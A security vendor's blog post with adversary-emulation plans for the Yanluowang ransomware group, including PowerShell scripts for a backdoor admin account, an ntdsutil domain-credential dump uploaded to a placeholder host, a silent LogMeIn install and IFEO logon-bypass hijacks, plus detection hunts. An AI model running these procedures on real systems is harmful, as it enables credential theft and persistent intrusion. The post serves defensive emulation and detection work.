Welcome to the September 2022 SCYTHE #ThreatThursday! This edition features Yanluowang emulation plans built from multiple public sources on the Yanluowang ransomware group. We would especially like to thank Cisco Talos for their excellent writeup of the actions the threat actors took inside the network. It is always difficult for victims to share data from their incidents, and this case is no exception. Cisco's transparency about its own incident is a model for victim organizations: sharing the data lets other organizations be better prepared.
The Yanluowang ransomware group has been active since at least August 2021, but many people had never heard the name before the group's involvement in the Cisco incident of August 2022. SCYTHE's publication of this threat should in no way be construed as victim blaming. On the contrary, there is sufficient data in the public domain to discuss the intrusion in large part because of the great work by Talos.
For this Threat Thursday, SCYTHE is taking a bit of a different approach. Traditionally, our ThreatThursday emulation plans are large and contain an entire attack chain. We’ve received feedback from customers that emulation plans of this size are difficult for some to operationalize. For this month’s ThreatThursday, we’ve broken the steps down into multiple plans, highlighting different components of the operation. If you want to run a complete emulation, you should consider combining the plans into a single campaign. We believe that most teams will be better served by consuming smaller (but by no means inconsequential) plans emulating Yanluowang procedures.
The plans being released with this ThreatThursday are:
Yanluowang ransomware, first discovered by Symantec, has been used in targeted attacks since at least August 2021. Some reports have suggested a link between Yanluowang and Thieflock (a RaaS developed by the Canthroid/Fivehands group) due to overlap in TTPs used. A deeper analysis of the code does not support shared authorship but instead may suggest that Yanluowang attacks could be carried out by former Thieflock affiliate groups.
Historically, use of AdFind and SoftPerfect Network Scanner has been noted as a potential precursor to Yanluowang attacks. Researchers have also observed the use of WMI to obtain a list of running processes on remote devices of interest (for example, to check for security tooling before acting), indicating some level of operational security discipline. Prior to deployment of the ransomware, PowerShell is often used to download other tools to aid in reconnaissance. Credential theft targets credentials stored in browsers (via GrabFF, GrabChrome, and BrowserPassView) and in KeePass databases (via KeeThief). Once Yanluowang is deployed, the malware terminates processes of interest so their files can be encrypted, encrypts files on the compromised device, appends the .yanluowang extension, and drops a README.txt ransom note.
In the most recent May attack, researchers observed some additional TTPs such as:
N/A
Attacks have been heavily focused on U.S. corporations in the financial sector but companies in manufacturing, IT services, consulting, and engineering have been targeted as well.
This emulation plan creates a new backdoor user “z” and adds this user to the local administrators group. The username and password observed were sourced from the Talos reporting.
After a three-minute delay (configurable), the user is deleted. The delay gives a threat hunter time to discover the new administrative user while it exists.
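The backdoor-user plan as a stand-alone PowerShell script, added here as an illustration (this is not SCYTHE's plan file). The password is a placeholder rather than the value from the Talos report, the delay defaults to the plan's three minutes, and the Administrators group is resolved by its well-known SID so the script works on localized Windows builds. The comments name the Security event IDs each step generates, which is what a hunter should be looking for during the delay.

```powershell
# Added example: emulate "create backdoor user z, add to local Administrators, delete after a delay".
# Placeholder password; substitute the value from the emulation plan if you need fidelity.
param(
    [string]$UserName     = 'z',
    [string]$Password     = 'ChangeMe-EmulationOnly!',   # placeholder, not the observed password
    [int]   $DelaySeconds = 180
)

$secure = ConvertTo-SecureString $Password -AsPlainText -Force

# Safety check: never "clean up" a real account that happened to share the name
if (Get-LocalUser -Name $UserName -ErrorAction SilentlyContinue) {
    throw "Local user '$UserName' already exists; aborting so cleanup cannot delete a legitimate account."
}

# Resolve Administrators by SID (S-1-5-32-544) rather than by localized display name
$admins = Get-LocalGroup -SID 'S-1-5-32-544'

# T1136.001 Create Account: Local Account  -> Security event 4720
New-LocalUser -Name $UserName -Password $secure -Description 'SCYTHE emulation' | Out-Null

# T1098 Account Manipulation (add to Administrators) -> Security event 4732
Add-LocalGroupMember -Group $admins -Member $UserName

# What a hunter enumerating local admins would see right now
Get-LocalGroupMember -Group $admins | Where-Object Name -like "*\$UserName" |
    Format-Table Name, PrincipalSource, ObjectClass

Write-Host "Backdoor user '$UserName' is a local admin for $DelaySeconds seconds; hunt for 4720/4732 now."
Start-Sleep -Seconds $DelaySeconds

# Cleanup -> Security events 4733 (member removed from group) and 4726 (account deleted)
Remove-LocalGroupMember -Group $admins -Member $UserName
Remove-LocalUser -Name $UserName
```

Run it from an elevated PowerShell 5.1 or later session (the LocalAccounts module ships with Windows 10 and Server 2016 onward). If the delay expires before your detection fires, the cleanup events 4733 and 4726 are a second chance to catch the activity retroactively.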
The first portion of the plan checks for the existence of ntdsutil.exe to ensure it is present (and in the expected path) on the system of interest.
Next, we create the directory of C:\users\public\z for the output if it doesn’t already exist.
Then we execute ntdsutil to create a full IFM (Install From Media) export, which writes a copy of ntds.dit together with the SYSTEM and SECURITY registry hives, and place the output in C:\users\public\z.
Then we download 7za.exe (the standalone 7-Zip executable), create a password-protected archive of the NTDS export, and upload the archive to the SCYTHE server.
The cleanup steps remove the directory C:\users\public\z and other artifacts in the directory that we created.
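The NTDS export plan written as one PowerShell script, added as an illustration rather than taken from the plan file. The 7-Zip download URL, the upload endpoint and the archive password are placeholders; the ntdsutil command line and the output layout (`Active Directory\ntds.dit` plus `registry\SYSTEM` and `registry\SECURITY`) are what ntdsutil actually produces. Note that ntdsutil only exists on domain controllers and on hosts with the AD DS tools installed, which is why the plan checks for it first.

```powershell
# Added example: ntdsutil IFM export, 7-Zip password-protected archive, upload, cleanup.
$OutDir      = 'C:\users\public\z'
$Ntdsutil    = Join-Path $env:SystemRoot 'System32\ntdsutil.exe'
$SevenZip    = Join-Path $OutDir '7za.exe'
$SevenZipUrl = 'https://example.invalid/7za.exe'   # placeholder; the plan fetches it from the SCYTHE server
$UploadUrl   = 'https://example.invalid/upload'    # placeholder for the SCYTHE server upload endpoint
$ArchivePw   = 'EmulationOnly!'                    # placeholder archive password

# Step 1: ntdsutil must be present at the expected path
if (-not (Test-Path $Ntdsutil)) { throw "ntdsutil.exe not found at $Ntdsutil (not a DC / no AD DS tools?)" }

# Step 2: staging directory (idempotent)
New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

# Step 3: full IFM export. ntdsutil creates the target folder itself and fails if it already
# holds files, so export into a fresh subfolder of the staging directory.
$IfmDir = Join-Path $OutDir 'ifm'
& $Ntdsutil 'activate instance ntds' 'ifm' "create full $IfmDir" 'quit' 'quit'
$dit = Join-Path $IfmDir 'Active Directory\ntds.dit'
if ($LASTEXITCODE -ne 0 -or -not (Test-Path $dit)) { throw 'ntdsutil IFM export failed' }

# Step 4: standalone 7-Zip, then an archive with encrypted headers (-mhe=on hides file names too)
Invoke-WebRequest -Uri $SevenZipUrl -OutFile $SevenZip
$Archive = Join-Path $OutDir 'ntds.7z'
& $SevenZip a -t7z "-p$ArchivePw" -mhe=on $Archive $IfmDir | Out-Null
if ($LASTEXITCODE -ne 0) { throw '7za failed to create the archive' }

# Step 5: exfiltrate the archive (HTTP POST of the raw bytes)
Invoke-WebRequest -Uri $UploadUrl -Method Post -InFile $Archive -ContentType 'application/octet-stream' | Out-Null

# Cleanup: remove the staging directory and every artifact in it
Remove-Item -Path $OutDir -Recurse -Force
```

For detection, the interesting telemetry is a process creation of ntdsutil.exe with `ifm` on the command line (Security 4688 with command-line auditing, or Sysmon event 1), followed by a new `Active Directory\ntds.dit` file outside the normal `C:\Windows\NTDS` location.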
This emulation downloads the LogMeIn.msi and performs a silent install.
We first create a staging directory “remote”:
Next we download the .msi file. Note: LogMeIn downloads are gated behind creating a GoTo account, so we have hosted the file on GitHub.
Next we install the program using the /quiet switch:
Finally, we perform a clean up to uninstall, delete the msi, and remove the staging directory.
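The LogMeIn plan as a PowerShell script, added as an illustration (not the plan file). The download URL is a placeholder for the GitHub-hosted copy, and the staging directory is under %TEMP% rather than wherever the plan puts it. Beyond the plan's four steps it adds the two things a practitioner usually wants from a silent MSI install: exit-code handling (3010 is success with a pending reboot, 1603 is a fatal error) and an uninstall keyed on the registered ProductCode so cleanup still works if the .msi has already been removed.

```powershell
# Added example: silent install / uninstall of LogMeIn.msi via msiexec with exit-code checks.
$StageDir = Join-Path $env:TEMP 'remote'
$MsiPath  = Join-Path $StageDir 'LogMeIn.msi'
$MsiUrl   = 'https://example.invalid/LogMeIn.msi'   # placeholder for the GitHub-hosted file
$LogPath  = Join-Path $StageDir 'install.log'

function Invoke-Msi {
    param([string[]]$Arguments)
    $p = Start-Process -FilePath 'msiexec.exe' -ArgumentList $Arguments -Wait -PassThru
    switch ($p.ExitCode) {
        0       { return 'success' }
        3010    { return 'success, reboot required' }
        1603    { throw "msiexec fatal error 1603; see $LogPath" }
        default { throw "msiexec exited with code $($p.ExitCode)" }
    }
}

# Step 1: staging directory
New-Item -ItemType Directory -Path $StageDir -Force | Out-Null

# Step 2: download the installer
Invoke-WebRequest -Uri $MsiUrl -OutFile $MsiPath

# Step 3: silent install. /quiet = no UI, /norestart = never reboot, /l*v = verbose log
Invoke-Msi @('/i', "`"$MsiPath`"", '/quiet', '/norestart', '/l*v', "`"$LogPath`"")

# Artifacts a defender can key on: new service(s) and an Uninstall registry entry
Get-Service | Where-Object DisplayName -like 'LogMeIn*' | Format-Table Name, Status, StartType
$product = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*' |
           Where-Object DisplayName -like 'LogMeIn*' | Select-Object -First 1

# Step 4: cleanup. Uninstall by ProductCode when registered, else fall back to the .msi path
if ($product -and $product.PSChildName -match '^\{[0-9A-F-]{36}\}$') {
    Invoke-Msi @('/x', $product.PSChildName, '/quiet', '/norestart')
} else {
    Invoke-Msi @('/x', "`"$MsiPath`"", '/quiet', '/norestart')
}
Remove-Item -Path $StageDir -Recurse -Force
```

On the detection side, a silent install of a remote-access tool surfaces as a System event 7045 (new service installed) and MsiInstaller events 1033/1040 in the Application log, none of which should appear on a host with no change ticket.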
We begin by querying the registry to obtain the current state of certain keys which are referenced later during clean-up to restore the initial state.
Then we download a benign executable (benign.exe) that will be used as a placeholder for what was cmd.exe in the case of the Cisco attack.
Sethc.exe is the accessibility program behind the Windows "Sticky Keys" feature (pressing Shift five times) and can be launched from the logon screen, before anyone has logged in. Narrator.exe is the program behind the screen-reader accessibility feature and is likewise available pre-logon. Because both run as SYSTEM from the secure desktop, they are classic logon-bypass targets. By registering a debugger under Image File Execution Options (IFEO), Windows launches the debugger program instead of the target whenever Sticky Keys or Narrator is invoked. We set these registry keys, pointing them to our notmalware.exe, with the following commands:
We then include a step which sets a scheduled task to kill the process spawned after we execute sethc.exe. This is an artifact of the emulation and not intended to be used in detection engineering.
These steps are repeated to illustrate the same login bypass technique via use of narrator.exe instead. Clean up steps are included at the end after a 4 minute delay.
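The local IFEO plan as one script, added here as an illustration (not the plan file), covering both sethc.exe and narrator.exe in a single pass: capture the baseline, set the Debugger value, wait the plan's four minutes, restore. The path to notmalware.exe is an assumption. The restore step is the part worth copying: a key that did not exist before is removed, a value that existed is put back, so the emulation does not leave a half-cleaned IFEO entry that would show up as a false positive in the next hunt.

```powershell
# Added example: IFEO Debugger hijack of accessibility binaries with exact baseline restore.
$Ifeo         = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$Targets      = 'sethc.exe', 'narrator.exe'
$Debugger     = 'C:\users\public\notmalware.exe'   # assumed path of the benign placeholder binary
$DelaySeconds = 240

# Baseline: did the per-image key exist, and did it already carry a Debugger value?
$baseline = @{}
foreach ($t in $Targets) {
    $key = Join-Path $Ifeo $t
    $baseline[$t] = @{
        KeyExisted = Test-Path $key
        Debugger   = (Get-ItemProperty -Path $key -Name Debugger -ErrorAction SilentlyContinue).Debugger
    }
}

# Set the hijack. Equivalent to:
#   reg add "HKLM\...\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "<path>" /f
# Windows then starts <path> with the original image path appended as an argument.
foreach ($t in $Targets) {
    $key = Join-Path $Ifeo $t
    New-Item -Path $key -Force | Out-Null
    Set-ItemProperty -Path $key -Name Debugger -Value $Debugger -Type String
}

# Trigger from the lock screen: Shift x5 (Sticky Keys) or Win+Ctrl+Enter (Narrator).
Write-Host "IFEO Debugger set for $($Targets -join ', '); restoring in $DelaySeconds seconds"
Start-Sleep -Seconds $DelaySeconds

# Restore the baseline exactly
foreach ($t in $Targets) {
    $key = Join-Path $Ifeo $t
    $b   = $baseline[$t]
    if (-not $b.KeyExisted) {
        Remove-Item -Path $key -Recurse -Force
    } elseif ($null -eq $b.Debugger) {
        Remove-ItemProperty -Path $key -Name Debugger -ErrorAction SilentlyContinue
    } else {
        Set-ItemProperty -Path $key -Name Debugger -Value $b.Debugger -Type String
    }
}
```

Sysmon event 13 (registry value set) on `...\Image File Execution Options\<image>\Debugger` is the cleanest detection point; Security 4657 works too if SACLs are configured on the IFEO key.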
The Talos blog reported that the adversary often used PsExec to add the registry values for the IFEO logon bypass on remote hosts. Prior to running this threat, please ensure you have updated the initial steps with the correct information for your environment:
The echo steps that follow are present for diagnostic purposes, ensuring the parameters used for testing are easily available in SCYTHE reporting. The “net use” command is used to validate connectivity with the intended target.
Similar to the previous threat, the registry queries that follow are used to establish baseline values which are referenced later during clean-up to restore the initial state.
After downloading PsExec, we leverage it to set the same debugger values in the registry on the remote host.
Clean up steps are included at the end to restore the registry to its initial state and remove the network share connection.
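The remote variant as a script, added as an illustration (not the plan file). Hostname, account, password, the local PsExec path and the benign debugger path are all placeholders to be replaced per environment, mirroring the plan's "update the initial steps" requirement. It keeps the plan's structure: echo the parameters for the report, validate connectivity with `net use`, read the baseline, write the value via PsExec, then undo and drop the share connection.

```powershell
# Added example: set the IFEO Debugger on a remote host through PsExec, then clean up.
$Target   = 'DC01'                              # placeholder hostname
$User     = 'CORP\emulation.admin'              # placeholder account with local admin on $Target
$Password = 'ReplaceMe!'                        # placeholder
$PsExec   = 'C:\Tools\PsExec.exe'               # assumed local path after download
$Debugger = 'C:\users\public\notmalware.exe'    # benign placeholder; the adversary used cmd.exe
$KeyPath  = 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'

# Echo parameters so they are captured in the emulation report
Write-Host "Target=$Target User=$User Key=$KeyPath Debugger=$Debugger"

# Connectivity / credential check. ADMIN$ is the share PsExec uses to drop PSEXESVC.exe.
net use "\\$Target\ADMIN$" /user:$User $Password
if ($LASTEXITCODE -ne 0) { throw "cannot connect to \\$Target\ADMIN$" }

function Invoke-RemoteReg {
    param([string[]]$RegArgs)
    # -accepteula suppresses the EULA prompt; -s runs reg.exe as SYSTEM on the remote host
    & $PsExec -accepteula "\\$Target" -u $User -p $Password -s reg.exe @RegArgs
    return $LASTEXITCODE
}

# Baseline: reg query returns 1 when the value does not exist
$hadDebugger = (Invoke-RemoteReg @('query', $KeyPath, '/v', 'Debugger')) -eq 0

# Write the Debugger value remotely (creates the sethc.exe key if needed)
$rc = Invoke-RemoteReg @('add', $KeyPath, '/v', 'Debugger', '/t', 'REG_SZ', '/d', $Debugger, '/f')
if ($rc -ne 0) { throw "remote reg add failed with $rc" }

# Cleanup: only delete what we created; a pre-existing value is left for manual review
if ($hadDebugger) {
    Write-Warning "Debugger value already existed on $Target; restore it from the query output above"
} else {
    Invoke-RemoteReg @('delete', $KeyPath, '/v', 'Debugger', '/f') | Out-Null
}
net use "\\$Target\ADMIN$" /delete
```

The remote side of this is loud: a System event 7045 for the PSEXESVC service, a Security 4624 logon type 3 for the account, and the registry write itself, all within a few seconds of each other on the target.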
There are several detection opportunities in these plans, many of which are covered by multiple rules. Where appropriate, a defense-in-depth approach should be taken by layering rules, even though one may cover the procedure in its current state.
If any of the alerts are detected in the environment, the response team should determine the depth of the Kill Chain, collect artifacts, and answer the following questions:
Once it has been determined how deep the intrusion goes, containment, eradication, and recovery should begin. After recovery, lessons learned should drive additional courses of action (COAs) to thwart the threat should it return, such as implementing additional security controls. As always, please follow your organization's response plan and evidence retention policies. We also recommend leveraging NIST SP 800-61 Rev. 2.
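A quick hunt for the artifacts these plans leave behind, added here as an illustration rather than one of the detection rules the post refers to. It generalizes beyond the two binaries in the plans by checking every pre-logon accessibility executable for an IFEO Debugger, and it pulls the account and service-install events that the backdoor-user, LogMeIn and PsExec plans generate. Run it elevated on the host under test; event queries need the Security log.

```powershell
# Added example: host-based hunt for IFEO hijacks, new local admins and new services.
$Ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
# All accessibility binaries reachable from the logon screen, not just sethc/narrator
$AccessibilityBins = 'sethc.exe','utilman.exe','osk.exe','narrator.exe','magnify.exe','displayswitch.exe','atbroker.exe'

function Find-IfeoDebugger {
    foreach ($bin in $AccessibilityBins) {
        $dbg = (Get-ItemProperty -Path (Join-Path $Ifeo $bin) -Name Debugger -ErrorAction SilentlyContinue).Debugger
        if ($dbg) { [pscustomobject]@{ Finding = 'IFEO Debugger'; Image = $bin; Detail = $dbg } }
    }
}

# Flatten an event's EventData into a hashtable keyed by field name
function ConvertTo-EventData($event) {
    $d = @{}
    foreach ($n in ([xml]$event.ToXml()).Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    return $d
}

function Find-AccountChanges {
    param([int]$Hours = 24)
    # 4720 = local account created, 4732 = member added to a security-enabled local group
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4720, 4732; StartTime = (Get-Date).AddHours(-$Hours) } -ErrorAction SilentlyContinue |
      ForEach-Object {
        $d = ConvertTo-EventData $_
        [pscustomobject]@{
            Finding = $(if ($_.Id -eq 4720) { 'Account created' } else { 'Added to local group' })
            Image   = $d['SubjectUserName']
            Detail  = $(if ($_.Id -eq 4720) { $d['TargetUserName'] } else { "$($d['MemberName']) -> $($d['TargetUserName'])" })
        }
      }
}

function Find-NewServices {
    param([int]$Hours = 24)
    # 7045 = a service was installed (PSEXESVC, LogMeIn, etc.)
    Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045; StartTime = (Get-Date).AddHours(-$Hours) } -ErrorAction SilentlyContinue |
      ForEach-Object {
        $d = ConvertTo-EventData $_
        [pscustomobject]@{ Finding = 'Service installed'; Image = $d['ServiceName']; Detail = $d['ImagePath'] }
      }
}

$findings = @(Find-IfeoDebugger) + @(Find-AccountChanges) + @(Find-NewServices)
if ($findings.Count -eq 0) { Write-Host 'No findings' } else { $findings | Format-Table -AutoSize }
```

Treat any IFEO Debugger on an accessibility binary as a confirmed finding; there is no legitimate reason for one on a production host. The event-based checks are noisier and should be reconciled against change records before escalating.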
This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.
Kristen Cotten and Jake Williams of SCYTHE’s Advanced Emulation Services team wrote these threats. Chris Peacock performed Detection Engineering.
SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors.